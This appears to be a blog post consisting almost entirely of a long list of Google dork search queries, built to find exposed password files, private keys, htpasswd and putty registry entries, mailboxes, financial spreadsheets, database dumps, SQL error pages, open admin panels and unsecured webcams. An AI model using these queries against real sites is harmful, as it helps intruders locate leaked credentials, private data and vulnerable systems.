 ext:log "Software: Microsoft Internet Information Services *.*"
 ext:mdb inurl:*.mdb inurl:fpdb shop.mdb
 ext:nsf nsf -gov -mil
 ext:plist filetype:plist inurl:bookmarks.plist
 ext:pqi pqi -database
 ext:reg "username=*" putty
 ext:txt "Final encryption key"
 ext:txt inurl:dxdiag
 ext:vmdk vmdk
 ext:vmx vmx
 filetype:asp DBQ=" * Server.MapPath("*.mdb")
 filetype:bkf bkf
 filetype:blt "buddylist"
 filetype:blt blt +intext:screenname
 filetype:cfg auto_inst.cfg
 filetype:cnf inurl:_vti_pvt access.cnf
 filetype:conf inurl:firewall -intitle:cvs
 filetype:config web.config -CVS
 filetype:ctt Contact
 filetype:ctt ctt messenger
 filetype:eml eml +intext:"Subject" +intext:"From" +intext:"To"
 filetype:fp3 fp3
 filetype:fp5 fp5 -site:gov -site:mil -"cvs log"
 filetype:fp7 fp7
 filetype:inf inurl:capolicy.inf
 filetype:lic lic intext:key
 filetype:log access.log -CVS
 filetype:log cron.log
 filetype:mbx mbx intext:Subject
 filetype:myd myd -CVS
 filetype:ns1 ns1
 filetype:ora ora
 filetype:ora tnsnames
 filetype:pdb pdb backup (Pilot | Pluckerdb)
 filetype:php inurl:index inurl:phpicalendar -site:sourceforge.net
 filetype:pot inurl:john.pot
 filetype:PS ps
 filetype:pst inurl:"outlook.pst"
 filetype:pst pst -from -to -date
 filetype:qbb qbb
 filetype:QBW qbw
 filetype:rdp rdp
 filetype:reg "Terminal Server Client"
 filetype:vcs vcs
 filetype:wab wab
 filetype:xls -site:gov inurl:contact
 filetype:xls inurl:"email.xls"
 Financial spreadsheets: finance.xls
 Financial spreadsheets: finances.xls
 Ganglia Cluster Reports
 haccess.ctl (one way)
 haccess.ctl (VERY reliable)
 ICQ chat logs, please...
 intext:"Session Start * * * *:*:* *" filetype:log
 intext:"Tobias Oetiker" "traffic analysis"
 intext:(password | passcode) intext:(username | userid | user) filetype:csv
 intext:gmail invite intext:http://gmail.google.com/gmail/a
 intext:SQLiteManager inurl:main.php
 intext:ViewCVS inurl:Settings.php
 intitle:"admin panel" +"
 RedKernel"
 intitle:"Apache::Status" (inurl:server-status | inurl:status.html | inurl:apache.html)
 intitle:"AppServ Open Project" -site:www.appservnetwork.com
 intitle:"ASP Stats Generator *.*" "ASP Stats Generator" "2003-2004 weppos"
 intitle:"Big Sister" +"OK Attention Trouble"
 intitle:"curriculum vitae" filetype:doc
 intitle:"edna:streaming mp3 server" -forums
 intitle:"FTP root at"
 intitle:"index of" +myd size
 intitle:"Index Of" -inurl:maillog maillog size
 intitle:"Index Of" cookies.txt size
 intitle:"index of" mysql.conf OR mysql_config
 intitle:"Index of" upload size parent directory
 intitle:"index.of *" admin news.asp configview.asp
 intitle:"index.of" .diz .nfo last modified
 intitle:"Joomla - Web Installer"
 intitle:"LOGREP - Log file reporting system" -site:itefix.no
 intitle:"Multimon UPS status page"
 intitle:"PHP Advanced Transfer" (inurl:index.php | inurl:showrecent.php )
 intitle:"PhpMyExplorer" inurl:"index.php" -cvs
 intitle:"statistics of" "advanced web statistics"
 intitle:"System Statistics" +"System and Network Information Center"
 intitle:"urchin (5|3|admin)" ext:cgi
 intitle:"Usage Statistics for" "Generated by Webalizer"
 intitle:"wbem" compaq login "Compaq Information Technologies Group"
 intitle:"Web Server Statistics for ****"
 intitle:"web server status" SSH Telnet
 intitle:"Welcome to F-Secure Policy Manager Server Welcome Page"
 intitle:"welcome.to.squeezebox"
 intitle:admin intitle:login
 intitle:Bookmarks inurl:bookmarks.html "Bookmarks
 intitle:index.of "Apache" "server at"
 intitle:index.of cleanup.log
 intitle:index.of dead.letter
 intitle:index.of inbox
 intitle:index.of inbox dbx
 intitle:index.of ws_ftp.ini
 intitle:intranet inurl:intranet +intext:"phone"
 inurl:"/axs/ax-admin.pl" -s?ri?t
 inurl:"/cricket/grapher.cgi"
 inurl:"bookmark.htm"
 inurl:"cacti" +inurl:"graph_view.php" +"Settings Tree View" -cvs -RPM
 inurl:"newsletter/admin/"
 inurl:"newsletter/admin/" intitle:"newsletter admin"
 inurl:"putty.reg"
 inurl:"smb.conf" intext:"workgroup" filetype:conf conf
 inurl:*db filetype:mdb
 inurl:/cgi-bin/pass.txt
 inurl:/_layouts/settings
 inurl:admin filetype:xls
 inurl:admin intitle:login
 inurl:backup filetype:mdb
 inurl:build.err
 inurl:cgi-bin/printenv
 inurl:cgi-bin/testcgi.exe "Please distribute TestCGI"
 inurl:changepassword.asp
 inurl:ds.py
 inurl:email filetype:mdb
 inurl:fcgi-bin/echo
 inurl:forum filetype:mdb
 inurl:forward filetype:forward -cvs
 inurl:getmsg.html intitle:hotmail
 inurl:log.nsf -gov
 inurl:main.php phpMyAdmin
 inurl:main.php Welcome to phpMyAdmin
 inurl:netscape.hst
 inurl:netscape.hst
 inurl:netscape.ini
 inurl:odbc.ini ext:ini -cvs
 inurl:perl/printenv
 inurl:php.ini filetype:ini
 inurl:preferences.ini "[emule]"
 inurl:profiles filetype:mdb
 inurl:report "EVEREST Home Edition "
 inurl:server-info "Apache Server Information"
 inurl:server-status "apache"
 inurl:snitz_forums_2000.mdb
 inurl:ssl.conf filetype:conf
 inurl:tdbin
 inurl:vbstats.php "page generated"
 inurl:wp-mail.php + "There doesn't seem to be any new mail."
 inurl:XcCDONTS.asp
 ipsec.conf
 ipsec.secrets
 ipsec.secrets
 Lotus Domino address books
 mail filetype:csv -site:gov intext:name
 Microsoft Money Data Files
 mt-db-pass.cgi files
 MySQL tabledata dumps
 mystuff.xml - Trillian data files
 OWA Public Folders (direct view)
 Peoples MSN contact lists
 php-addressbook "This is the addressbook for *" -warning
 phpinfo()
 phpMyAdmin dumps
 phpMyAdmin dumps
 private key files (.csr)
 private key files (.key)
 Quicken data files
 rdbqds -site:.edu -site:.mil -site:.gov
 robots.txt
 site:edu admin grades
 site:www.mailinator.com inurl:ShowMail.do
 SQL data dumps
 Squid cache server reports
 Unreal IRCd
 WebLog Referrers
 Welcome to ntop!
 Fichier contenant des informations sur le r?seau :
 filetype:log intext:"ConnectionManager2"
 "apricot - admin" 00h
 "by Reimar Hoven. All Rights Reserved. Disclaimer" | inurl:"log/logdb.dta"
 "Network Host Assessment Report" "Internet Scanner"
 "Output produced by SysWatch *"
 "Phorum Admin" "Database Connection" inurl:forum inurl:admin
 phpOpenTracker" Statistics
 "powered | performed by Beyond Security's Automated Scanning" -kazaa -example
 "Shadow Security Scanner performed a vulnerability assessment"
 "SnortSnarf alert page"
 "The following report contains confidential information" vulnerability -search
 "The statistics were last upd?t?d" "Daily"-microsoft.com
 "this proxy is working fine!" "enter *" "URL***" * visit
 "This report lists" "identified by Internet Scanner"
 "Traffic Analysis for" "RMON Port * on unit *"
 "Version Info" "Boot Version" "Internet Settings"
 ((inurl:ifgraph "Page generated at") OR ("This page was built using ifgraph"))
 Analysis Console for Incident Databases
 ext:cfg radius.cfg
 ext:cgi intext:"nrg-" " This web page was created on "
 filetype:pdf "Assessment Report" nessus
 filetype:php inurl:ipinfo.php "Distributed Intrusion Detection System"
 filetype:php inurl:nqt intext:"Network Query Tool"
 filetype:vsd vsd network -samples -examples
 intext:"Welcome to the Web V.Networks" intitle:"V.Networks [Top]" -filetype:htm
 intitle:"ADSL Configuration page"
 intitle:"Azureus : Java BitTorrent Client Tracker"
 intitle:"Belarc Advisor Current Profile" intext:"Click here for Belarc's PC Management products, for large and small companies."
 intitle:"BNBT Tracker Info"
 intitle:"Microsoft Site Server Analysis"
 intitle:"Nessus Scan Report" "This file was generated by Nessus"
 intitle:"PHPBTTracker Statistics" | intitle:"PHPBT Tracker Statistics"
 intitle:"Retina Report" "CONFIDENTIAL INFORMATION"
 intitle:"start.managing.the.device" remote pbx acc
 intitle:"sysinfo * " intext:"Generated by Sysinfo * written by The Gamblers."
 intitle:"twiki" inurl:"TWikiUsers"
 inurl:"/catalog.nsf" intitle:catalog
 inurl:"install/install.php"
 inurl:"map.asp?" intitle:"WhatsUp Gold"
 inurl:"NmConsole/Login.asp" | intitle:"Login - Ipswitch WhatsUp Professional 2005" | intext:"Ipswitch WhatsUp Professional 2005 (SP1)" "Ipswitch, Inc"
 inurl:"sitescope.html" intitle:"sitescope" intext:"refresh" -demo
 inurl:/adm-cfgedit.php
 inurl:/cgi-bin/finger? "In real life"
 inurl:/cgi-bin/finger? Enter (account|host|user|username)
 inurl:/counter/index.php intitle:"+PHPCounter 7.*"
 inurl:CrazyWWWBoard.cgi intext:"detailed debugging information"
 inurl:login.jsp.bak
 inurl:ovcgi/jovw
 inurl:phpSysInfo/ "created by phpsysinfo"
 inurl:portscan.php "from Port"|"Port Range"
 inurl:proxy | inurl:wpad ext:pac | ext:dat findproxyforurl
 inurl:statrep.nsf -gov
 inurl:status.cgi?host=all
 inurl:testcgi xitami
 inurl:webalizer filetype:png -.gov -.edu -.mil -opendarwin
 inurl:webutil.pl
 Looking Glass
 site:netcraft.com intitle:That.Site.Running Apache
 "A syntax error has occurred" filetype:ihtml
 "access denied for user" "using password"
 "An illegal character has been found in the statement" -"previous message"
 "ASP.NET_SessionId" "data source="
 "Can't connect to local" intitle:warning
 "Chatologica MetaSearch" "stack tracking"
 "detected an internal error [IBM][CLI Driver][DB2/6000]"
 "error found handling the request" cocoon filetype:xml
 "Fatal error: Call to undefined function" -reply -the -next
 "Incorrect syntax near"
 "Incorrect syntax near"
 "Internal Server Error" "server at"
 "Invision Power Board Database Error"
 "ORA-00933: SQL command not properly ended"
 "ORA-12541: TNS:no listener" intitle:"error occurred"
 "Parse error: parse error, unexpected T_VARIABLE" "on line" filetype:php
 "PostgreSQL query failed: ERROR: parser: parse error"
 "Supplied argument is not a valid MySQL result resource"
 "Syntax error in query expression " -the
 "The s?ri?t whose uid is " "is not allowed to access"
 "There seems to have been a problem with the" " Please try again by clicking the Refresh button in your web browser."
 "Unable to jump to row" "on MySQL result index" "on line"
 "Unclosed quotation mark before the character string"
 "Warning: Bad arguments to (join|implode) () in" "on line" -help -forum
 "Warning: Cannot modify header information - headers already sent"
 "Warning: Division by zero in" "on line" -forum
 
 "Warning: mysql_connect(): Access denied for user: '*@*" "on line" -help -forum
 "Warning: mysql_query()" "invalid query"
 "Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL"
 "Warning: Supplied argument is not a valid File-Handle resource in"
 "Warning:" "failed to open stream: HTTP request failed" "on line"
 "Warning:" "SAFE MODE Restriction in effect." "The s?ri?t whose uid is" "is not allowed to access owned by uid 0 in" "on line"
 "SQL Server Driver][SQL Server]Line 1: Incorrect syntax near"
 An unexpected token "END-OF-STATEMENT" was found
 Coldfusion Error Pages
 filetype:asp + "[ODBC SQL"
 filetype:asp "Custom Error Message" Category Source
 filetype:log "PHP Parse error" | "PHP Warning" | "PHP Error"
 filetype:php inurl:"logging.php" "Discuz" error
 ht://Dig htsearch error
 IIS 4.0 error messages
 IIS web server error messages
 Internal Server Error
 intext:"Error Message : Error loading required libraries."
 intext:"Warning: Failed opening" "on line" "include_path"
 intitle:"Apache Tomcat" "Error Report"
 intitle:"Default PLESK Page"
 intitle:"Error Occurred While Processing Request" +WHERE (SELECT|INSERT) filetype:cfm
 intitle:"Error Occurred" "The error occurred in" filetype:cfm
 intitle:"Error using Hypernews" "Server Software"
 intitle:"Execution of this s?ri?t not permitted"
 intitle:"Under construction" "does not currently have"
 intitle:Configuration.File inurl:softcart.exe
 MYSQL error message: supplied argument....
 mysql error with query
 Netscape Application Server Error page
 ORA-00921: unexpected end of SQL command
 ORA-00921: unexpected end of SQL command
 ORA-00936: missing expression
 PHP application warnings failing "include_path"
 sitebuildercontent
 sitebuilderfiles
 sitebuilderpictures
 Snitz! forums db path error
 SQL syntax error
 Supplied argument is not a valid PostgreSQL result
 warning "error on line" php sablotron
 Windows 2000 web server error messages
 "ftp://" "www.eastgame.net"
 "html allowed" guestbook
 : vBulletin Version 1.1.5"
 "Select a database to view" intitle:"filemaker pro"
 "set up the administrator user" inurl:pivot
 "There are no Administrators Accounts" inurl:admin.php -mysql_fetch_row
 "Welcome to Administration" "General" "Local Domains" "SMTP Authentication" inurl:admin
 "Welcome to Intranet"
 "Welcome to PHP-Nuke" congratulations
 "Welcome to the Prestige Web-Based Configurator"
 "YaBB SE Dev Team"
 "you can now password" | "this is a special page only seen by you. your profile visitors" inurl:imchaos
 ("Indexed.By"|"Monitored.By") hAcxFtpScan
 (inurl:/shop.cgi/page=) | (inurl:/shop.pl/page=)
 allinurl:"index.php" "site=sglinks"
 allinurl:install/install.php
 allinurl:intranet admin
 filetype:cgi inurl:"fileman.cgi"
 filetype:cgi inurl:"Web_Store.cgi"
 filetype:php inurl:vAuthenticate
 filetype:pl intitle:"Ultraboard Setup"
 Gallery in configuration mode
 Hassan Consulting's Shopping Cart Version 1.18
 intext:"Warning: * am able * write ** configuration file" "includes/configure.php" -
 intitle:"Gateway Configuration Menu"
 intitle:"Horde :: My Portal" -"[Tickets"
 intitle:"Mail Server CMailServer Webmail" "5.2"
 intitle:"MvBlog powered"
 intitle:"Remote Desktop Web Connection"
 intitle:"Samba Web Administration Tool" intext:"Help Workgroup"
 intitle:"Terminal Services Web Connection"
 intitle:"Uploader - Uploader v6" -pixloads.com
 intitle:osCommerce inurl:admin intext:"redistributable under the GNU" intext:"Online Catalog" -demo -site:oscommerce.com
 intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"
 intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"
 inurl:"/NSearch/AdminServlet"
 inurl:"index.php? module=ew_filemanager"
 inurl:aol*/_do/rss_popup?blogID=
 inurl:footer.inc.php
 inurl:info.inc.php
 inurl:ManyServers.htm
 inurl:newsdesk.cgi? inurl:"t="
 inurl:pls/admin_/gateway.htm
 inurl:rpSys.html
 inurl:search.php vbulletin
 inurl:servlet/webacc
 natterchat inurl:home.asp -site:natterchat.co.uk
 XOOPS Custom Installation
 inurl:htpasswd filetype:htpasswd
 inurl:yapboz_detay.asp + View Webcam User Accessing
 allinurl:control/multiview
 inurl:"ViewerFrame?Mode="
 intitle:"WJ-NT104 Main Page"
 inurl:netw_tcp.shtml
 intitle:"supervisioncam protocol"
 Read More..
Diposting oleh
Jericho PS
 | MARVEL and SPIDER-MAN: TM &  2007 Marvel Characters, Inc. Motion Picture © 2007 Columbia Pictures Industries, Inc. All Rights Reserved.   2007 Sony Pictures Digital Inc. All rights reserved. blogger templates |